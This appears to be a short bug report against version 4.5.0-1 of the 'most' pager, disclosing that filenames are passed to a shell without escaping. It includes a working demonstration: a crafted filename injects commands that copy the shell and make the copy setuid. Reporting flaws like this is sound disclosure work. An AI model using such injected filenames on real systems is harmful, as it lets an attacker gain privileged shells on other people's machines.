Package: most Version: 4.5.0-1 Filenames passed to a shell by most are not properly escaped: $ most '/usr/doc/tapes/SPEED&MEMORY.gz' /usr/doc/taper/SPEED.gz: No such file or directory This allows trojan horse filenames to be constructed: $ echo gotcha | gzip > 'bug;cp `which sh` hole; chmod u+s hole' $ most bug* <transitory error message: bug.gz: No such file or directory> $ ls -l hole -rwsr-xr-x 1 bap bap 232956 Sep 9 11:14 hole